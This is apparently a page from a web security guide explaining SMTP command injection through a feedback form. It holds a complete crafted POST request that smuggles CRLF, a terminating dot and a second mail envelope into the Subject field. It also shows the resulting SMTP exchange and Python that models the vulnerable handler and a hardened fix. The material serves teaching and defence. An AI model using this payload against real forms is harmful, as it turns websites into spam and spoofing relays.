Web application security - the fast guide 1.1 | Page 147
Chapter 7 - Attack execution (3)
The difference from the header-manipulation approach described earlier is that the injected field ends up inside the body of the SMTP DATA command. An attacker who can get a CRLF followed by a line containing a single dot into that field terminates the current message early and is back in SMTP command mode, where a fresh MAIL FROM, RCPT TO and DATA sequence can be issued. This gives full control over an entirely new message, envelope sender and recipient included, rather than just extra headers on the existing one.
As an example, suppose the feedback form copies its Subject field straight into the SMTP conversation without any input validation, and the attacker submits the following request:
POST /feedback.php HTTP/1.1
Host: vulnerableApp.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 323

From=legitimateSender@legMailServer.com&Subject=Site+feedback%0d%0aany+message%0d%0a%2e%0d%0aMAIL+FROM:+mail@attacker-viagra.com%0d%0aRCPT+TO:+victim@spamVictim.com%0d%0aDATA%0d%0aFrom:+mail@attacker-viagra.com%0d%0aTo:+victim@spamVictim.com%0d%0aSubject:+Cheap+V1AGR4%0d%0aBlah%0d%0a%2e%0d%0a&Message=spam+message+contents
The resulting SMTP conversation, as sent by the application to its mail server, is:
MAIL FROM: legitimateSender@legMailServer.com
RCPT TO: feedback@vulnerableApp.com
DATA
From: legitimateSender@legMailServer.com
To: feedback@vulnerableApp.com
Subject: Site feedback
any message
.
MAIL FROM: mail@attacker-viagra.com
RCPT TO: victim@spamVictim.com
DATA
From: mail@attacker-viagra.com
To: victim@spamVictim.com
Subject: Cheap V1AGR4
Blah
.
spam message contents
.
Two messages are therefore sent: the first is the legitimate feedback, the second is entirely controlled by the attacker. Note that the application's own Message field and its closing dot arrive after the injected terminator, when the server is already back in command mode, so the server rejects them as unrecognised commands; by then both messages have been accepted for delivery. Unlike plain header injection, this technique only works when the tainted field is written inside DATA and the application neither strips CR/LF from it nor dot-stuffs the lines it sends.
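The following Python is an added example, not code from the book or from any real feedback.php. It models a hypothetical handler that writes the form fields straight into the SMTP session, a minimal SMTP state machine that shows how the server interprets the resulting stream (two queued messages, plus the trailing lines rejected in command mode), and a hardened builder that refuses CR/LF in header fields and dot-stuffs the body. All addresses and hosts are the page's hypothetical ones; the form body is reconstructed from the request above.

```python
# Added example, not from the book: models the SMTP command injection above.
# The feedback handler, the mail server and every address/host are hypothetical.
from urllib.parse import parse_qs

CRLF = "\r\n"
FEEDBACK_RCPT = "feedback@vulnerableApp.com"   # hypothetical recipient


def build_smtp_stream(sender, subject, message, recipient=FEEDBACK_RCPT):
    """Vulnerable: copies the form fields into the SMTP session unchanged,
    the way the page's feedback.php is assumed to behave."""
    return (f"MAIL FROM: {sender}{CRLF}RCPT TO: {recipient}{CRLF}DATA{CRLF}"
            f"From: {sender}{CRLF}To: {recipient}{CRLF}Subject: {subject}{CRLF}"
            f"{message}{CRLF}.{CRLF}")


class HeaderInjectionError(ValueError):
    """Raised when a header field contains CR or LF."""


def build_smtp_stream_safe(sender, subject, message, recipient=FEEDBACK_RCPT):
    """Hardened: refuse CR/LF in header fields and dot-stuff the body
    (RFC 5321 section 4.5.2) so a '.' line cannot end DATA early."""
    for name, value in (("From", sender), ("Subject", subject)):
        if "\r" in value or "\n" in value:
            raise HeaderInjectionError(f"CR/LF in {name} field")
    lines = message.replace("\r\n", "\n").replace("\r", "\n").split("\n")
    stuffed = CRLF.join("." + ln if ln.startswith(".") else ln for ln in lines)
    return build_smtp_stream(sender, subject, stuffed, recipient)


def simulate_smtp_server(stream):
    """Minimal SMTP state machine: envelope commands in command mode, then
    DATA until a line holding a single '.'. Returns (delivered, rejected):
    delivered lists the queued messages, rejected the lines that reached
    command mode without being a valid command (a real server answers
    500 'command unrecognized' to each of them)."""
    delivered, rejected = [], []
    mail_from, rcpt_to, body, in_data = None, [], [], False
    for line in stream.split(CRLF):
        if in_data:
            if line == ".":                       # end of DATA: message queued
                delivered.append({"mail_from": mail_from, "rcpt_to": rcpt_to,
                                  "body": CRLF.join(body)})
                mail_from, rcpt_to, body, in_data = None, [], [], False
            else:                                 # undo dot-stuffing
                body.append(line[1:] if line.startswith(".") else line)
            continue
        upper = line.upper()
        if upper.startswith("MAIL FROM:"):
            mail_from = line.split(":", 1)[1].strip()
        elif upper.startswith("RCPT TO:"):
            rcpt_to.append(line.split(":", 1)[1].strip())
        elif upper == "DATA" and mail_from and rcpt_to:
            in_data = True
        elif line:
            rejected.append(line)
    return delivered, rejected


# Form body from the page's request, reconstructed on one line (constructed input).
ATTACK_BODY = (
    "From=legitimateSender@legMailServer.com"
    "&Subject=Site+feedback%0d%0aany+message%0d%0a%2e%0d%0a"
    "MAIL+FROM:+mail@attacker-viagra.com%0d%0aRCPT+TO:+victim@spamVictim.com%0d%0a"
    "DATA%0d%0aFrom:+mail@attacker-viagra.com%0d%0aTo:+victim@spamVictim.com%0d%0a"
    "Subject:+Cheap+V1AGR4%0d%0aBlah%0d%0a%2e%0d%0a"
    "&Message=spam+message+contents"
)


def handle_feedback(form_body, builder=build_smtp_stream):
    """What the hypothetical feedback.php does with a POSTed form body."""
    fields = {k: v[0] for k, v in parse_qs(form_body).items()}
    return builder(fields["From"], fields["Subject"], fields["Message"])


def safe_handler_rejects(form_body):
    """True if the hardened builder refuses the request."""
    try:
        handle_feedback(form_body, builder=build_smtp_stream_safe)
    except HeaderInjectionError:
        return True
    return False


if __name__ == "__main__":
    delivered, rejected = simulate_smtp_server(handle_feedback(ATTACK_BODY))
    for m in delivered:
        print(f"queued: {m['mail_from']} -> {m['rcpt_to']}")
    print("rejected in command mode:", rejected)
    print("hardened builder rejects attack:", safe_handler_rejects(ATTACK_BODY))
```

Running it against the page's request queues the legitimate feedback and the attacker's message, and reports "spam message contents" and the final "." as the two lines rejected in command mode. The hardened builder stops the same request at the Subject field; the dot-stuffing in the body path matters as well, since a Message field containing a lone "." line would otherwise terminate DATA just like the injected one.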